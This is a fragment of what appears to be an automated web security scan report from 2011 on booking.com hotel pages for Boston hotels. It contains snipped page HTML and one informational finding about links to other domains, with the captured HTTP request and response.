style="background-position: 0 -280px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/458/4582486.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/458/4582486.jpg' />"


style="background-position: 0 -360px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/458/4582479.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/458/4582479.jpg' />"


style="background-position: 0 -320px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/122/1223789.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/122/1223789.jpg' />"


style="background-position: 0 -160px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/122/1223790.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/122/1223790.jpg' />"


style="background-position: 0 -200px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/106/1064885.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/106/1064885.jpg' />"


style="background-position: 0 -40px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/458/4582543.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/458/4582543.jpg' />"


style="background-position: 0 -400px;"

onclick="return false;"
></a>
...[SNIP]...
</b> represents the hotel's performance in areas such as cleanliness, comfort, value for money etc. ">100% Hotel reliability <img src="http://r.bstatic.com/static/img/info.png" style="margin-left: 3px; margin-bottom: -3px;" /></h6>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />When would you like to stay at Hotel Commonwealth?</span>
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar reqJS inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar reqJS inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
</strong>"
href="/hotel/us/radison-boston.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"
>
<img
class="hotelImg"
src="http://s.bstatic.com/images/hotel/square90/283/2833172.jpg"
width="60" height="60"
title="Radisson Hotel Boston"
alt="hotel"/>
</a>
...[SNIP]...
<a href="/hotel/us/radison-boston.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img src="http://q.bstatic.com/static/img/icons/stars/3sterren-small5.png" alt="3-star" /></a>
...[SNIP]...
<span class="room">
<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 718.20" /> Double Room <span class="price">
...[SNIP]...
</strong>"
href="/hotel/us/di-saugus.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"
>
<img
class="hotelImg"
src="http://s.bstatic.com/images/hotel/square90/149/1493811.jpg"
width="60" height="60"
title="Holiday Inn Express Saugus Logan Airport"
alt="hotel"/>
</a>
...[SNIP]...
<a href="/hotel/us/di-saugus.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img src="http://s.bstatic.com/static/img/icons/stars/2sterren-small5.png" alt="2-star" /></a>
...[SNIP]...
<span class="room">
<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 418" /> Double Room <span class="price">
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>General
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Activities
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Services
</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>Internet</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>Parking</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Check in</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Check out</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Cancellation / Prepayment</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Children and extra beds</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/> Pets</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>Accepted credit cards</span>
...[SNIP]...
<a title="Ready to book? Change your dates" id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Change your dates"
title="Go to the top of the page"
class="use_sprites icon_top"
/>
<span>
...[SNIP]...
<div style="text-align:center;padding:3em;"><img src="http://r.bstatic.com/static/img/loading_filterbox.gif" alt="loading..." /></div>
...[SNIP]...
<a title="Ready to book? Change your dates" id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Change your dates"
title="Go to the top of the page"
class="use_sprites icon_top"
/>
<span>
...[SNIP]...
</span>
<a id="share_popup_fb" class="fb_share" rel="250 nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http://www.booking.com/hotel/us/c-boston-massachusettes.html?label=socnet_fb_h_shp&aid=339528" title="Share a link to this hotel page on Facebook" name="on Facebook"><img class="share_popup_img use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>
<a rel="250 nofollow" id="share_popup_t" class="share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Hotel Commonwealth" id="t" title="Share a link to this hotel page on Twitter" data-shorturl="http://www.booking.com/hotel/us/c-boston-massachusettes.html?label=socnet_t_h&aid=339529" name="on Twitter"><img class="share_popup_img use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
3Baid%3D339530;title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com;notes=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees"><img class="share_popup_img use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
</span>

<div id="share_popup_close"><img class="share_popup_img use_sprites icon_share_popup_close" src="http://s.bstatic.com/static/img/transparent.png" /></div>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<img src="http://s.bstatic.com/static/img/marker-hotel-blue.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-hotel-grey.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport-large.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-city.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...
19.181. http://www.booking.com/hotel/us/copley-square.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/copley-square.en.html" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/hotel.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel in Boston U.S.A." />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
<div id="homein" >

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
enter=42.3482287447141%2c-71.0785603523254&zoom=14&size=215x150&sensor=false&language=en&client=gme-booking&signature=8hFN_WewIMzyC0y1iNDnIokf8qs="


class="hotel
show_map

exp_smallimg">


<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" alt="Current hotel" title="Copley Square Hotel" />

</a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://r.bstatic.com/images/hotel/square40/283/2833172.jpg"
width="30"
height="30"
alt="hotel Radisson Hotel Boston, Boston"
/>
</a>
...[SNIP]...
<a href="/hotel/us/radison-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://s.bstatic.com/images/hotel/square40/169/1691256.jpg"
width="30"
height="30"
alt="hotel Copley Square Hotel, Boston"
/>
</a>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://s.bstatic.com/images/hotel/square40/224/2240322.jpg"
width="30"
height="30"
alt="hotel Newbury Guest House, Boston"
/>
</a>
...[SNIP]...
<a href="/hotel/us/newbury-guest-house.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_gb_h&title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com&annotation=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees" id="gb" title="Bookmark this hotel page with Google Bookmarks" name="on Google">Google</a>
</li>
<li>


<a rel="250 nofollow" class="jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Copley Square Hotel " id="t" data-shorturl="http://www.booking.com/hotel/us/copley-square.html?label=socnet_t_h&aid=339529" title="Share a link to this hotel page on Twitter" name="on Twitter">Twitter</a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.bebo.com/c/share?Url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_b_h&TitleCopley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com" id="b" title="Share a link to this hotel page on Bebo" name="on Bebo">Bebo</a>
</li>
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_r_h&title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com" id="r" title="Share a link to this hotel page on Reddit" name="on Reddit">Reddit</a>
</li>
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://delicious.com/save?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_d_h&title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com&notes=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees" id="d" title="Bookmark this hotel page with Delicious" name="on Delicious">Delicious</a>
...[SNIP]...
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_my_h&t=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com&l=3&c=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees" id="my" title="Share a link to this hotel page on MySpace" name="on MySpace">MySpace</a>
...[SNIP]...
</style>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/169/1691256.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/169/1691256.jpg' />"


style="background-position: 0 -400px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/435/4354432.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354432.jpg' />"


style="background-position: 0 -480px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354438.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354438.jpg' />"


style="background-position: 0 -520px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/168/1685102.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685102.jpg' />"


style="background-position: 0 -80px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/168/1685101.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685101.jpg' />"


style="background-position: 0 -40px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/168/1685107.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' />"


style="background-position: 0 -240px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685109.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685109.jpg' />"


style="background-position: 0 -280px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354499.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354499.jpg' />"


style="background-position: 0 -680px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/168/1685105.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/168/1685105.jpg' />"


style="background-position: 0 -200px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354486.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354486.jpg' />"


style="background-position: 0 -600px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354483.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354483.jpg' />"


style="background-position: 0 -560px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/168/1685100.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/168/1685100.jpg' />"


style="background-position: 0 0;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/435/4354503.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354503.jpg' />"


style="background-position: 0 -720px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685104.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685104.jpg' />"


style="background-position: 0 -160px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/168/1685111.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/168/1685111.jpg' />"


style="background-position: 0 -320px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/435/4354427.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/435/4354427.jpg' />"


style="background-position: 0 -440px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685112.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685112.jpg' />"


style="background-position: 0 -360px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/435/4354491.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354491.jpg' />"


style="background-position: 0 -640px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685103.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685103.jpg' />"


style="background-position: 0 -120px;"

onclick="return false;"
></a>
...[SNIP]...
</b> represents the hotel's performance in areas such as cleanliness, comfort, value for money etc. ">98.88% Hotel reliability <img src="http://r.bstatic.com/static/img/info.png" style="margin-left: 3px; margin-bottom: -3px;" /></h6>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />When would you like to stay at Copley Square Hotel?</span>
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar reqJS inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
</strong>">
<img src="http://r.bstatic.com/images/hotel/square90/168/1685102.jpg" width="60" height="60" alt="Queen Room"/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625505" class="togglelink jqrt " title="">
...[SNIP]...
<div class="roomDefaultUse">


<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />


</div>
